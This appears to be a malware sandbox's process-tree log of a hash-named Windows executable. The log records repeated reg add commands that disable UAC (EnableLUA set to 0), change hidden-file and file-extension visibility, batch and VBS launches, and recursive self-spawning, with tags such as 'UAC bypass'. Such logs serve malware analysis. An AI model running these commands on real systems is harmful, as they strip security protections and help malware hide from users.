- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\TmEccEMQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1884
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2484
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2824

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2620

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:2912
- C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
  C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
  2⤵
  PID:2756
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
    3⤵
    - UAC bypass
    - Checks whether UAC is enabled
    - System policy modification
    PID:2624
  - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
      C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
      4⤵
      PID:2296
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        5⤵
        
        PID:2160
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\kaQQoIsY.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
        5⤵
        
        PID:2468
      - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        6⤵
        
        PID:836
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        5⤵
        
        PID:2988
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        5⤵
        
        PID:2784
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        5⤵
        
        PID:528
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\TGUYwEIE.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
    3⤵
    PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
      C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
      4⤵
      PID:1424
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
    3⤵
    - Modifies registry key
    PID:1564
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
    3⤵
    PID:920
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
    3⤵
    PID:2020

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\HusEQwYo.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2060
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:1372

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1873098298134138450-365245595146801798720539929571586465742-280670220-2036127636"
1⤵
PID:2908

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6421024405180385462101429562-17885600662089995411-975514882-499958562-1171480524"
1⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2632
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2668
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:2840
- C:\Windows\SysWOW64\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
  2⤵
  PID:2784

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2002835953757399672-1019198249331531243-7120391761440292074-1995539493369220305"
1⤵
PID:280

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:1540

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1898538082-1882862511035100369-1089500193-335962678-1875569943-3294575712063297430"
1⤵
PID:460

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-205621098314879828941847218034-1044609460-99601150-695970888-1370926562-2024205308"
1⤵
PID:1372

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "11192655031994488105-2075508982-2023217331697532133437821615-5216891971799158197"
1⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QOswEUoA.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:1624

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:1808

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
- Modifies visibility of file extensions in Explorer
PID:884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-330766055-177363515645316845625404941-10027156301991091397-1126308036-1641885095"
1⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\hYQoAAsQ.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:1124
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\cOkUIcIo.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1324
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1904
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:1416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:952

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:1248

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2936

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:1992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1108236058197336886-1277416676-230761978599202300-910111543-2124265714288287812"
1⤵
- UAC bypass
PID:1728

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-816306250-1202668717153068600236924289220285364061278544107-5900216441266726426"
1⤵
PID:1924

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VaUgswEM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2632
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\jAYMkcAc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:268
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    - Checks whether UAC is enabled
    - System policy modification
    PID:2164

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- Modifies registry key
PID:1540
- C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
  C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
  2⤵
  PID:2600

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:2812

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GcggsQos.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:904

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies visibility of file extensions in Explorer
PID:2784

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2764

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- System policy modification
PID:1248

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20855343131879693358-1182924138-608279434518334684204052129-878339007452950502"
1⤵
PID:2268

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kgckckcc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2760

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:2936

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-417960168133020999688713515571288383210800984838477483943000430091485537528"
1⤵
PID:2236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2088

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:1896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19342229631604958551998000722-1137070376-12884287321649265963-176887291-798234336"
1⤵
PID:928

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
- UAC bypass
- Modifies registry key
PID:988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\MWIkIckM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:1760
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  - UAC bypass
  PID:1156
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies registry key
  PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
  2⤵
  PID:2200

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:2812

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:1800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1136439912-34643966011692617141315169597-65917780212464656611924990377-1106203321"
1⤵
PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\sCMUAQYM.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  PID:552
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:540

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2144

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1743811156-20870118659087711311824660350-4377759888104011901883481562-2029459863"
1⤵
PID:836

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:1828

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EscoMkwg.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:1608

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:3020

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:2360

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:3048

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:2120

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
1⤵
PID:2096

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8191183171872392078-16638690111020184875-2037773055709825751-176336606511124358"
1⤵
- UAC bypass
PID:2224

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-85996052814000093561148464131-19655320911207467969-196270042-16711467071020073680"
1⤵
- Modifies visibility of file extensions in Explorer
PID:2508

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
1⤵
PID:1104

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
- Modifies registry key
PID:952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2152

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2072

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:1112
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2956
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:2548

C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
1⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\CkYwwUAo.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
1⤵
PID:2948

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
1⤵
PID:940
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2864
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies registry key
  PID:2752
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1892

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
1⤵
PID:2520

C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
1⤵
PID:2600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\igoUEskc.bat" "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe""
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1164
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:2620
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1964
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  - Modifies visibility of file extensions in Explorer
  PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
    3⤵
    PID:1524
  - - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
      C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
      4⤵
      PID:2436
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        5⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:2520
      - C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        6⤵
        
        PID:2108
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        7⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        8⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2824
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        9⤵
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        10⤵
        
        PID:832
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        11⤵
        
        PID:592
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        12⤵
        
        PID:1424
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        13⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        14⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        15⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        16⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        17⤵
        
        PID:1700
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        18⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        19⤵
        
        PID:1396
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        20⤵
        
        PID:1380
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        21⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        22⤵
        
        PID:2020
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        23⤵
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        24⤵
        
        PID:672
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        25⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        26⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1248
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        27⤵
        
        PID:2672
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        28⤵
        
        PID:928
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        29⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        30⤵
        
        PID:2652
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        31⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        32⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        33⤵
        Modifies visibility of file extensions in Explorer
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a.exe
        
        C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a
        34⤵
        
        PID:788
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c "C:\Users\Admin\AppData\Local\Temp\581799237e8f5c3cecfedfb6b8aaeb7a"
        35⤵
        
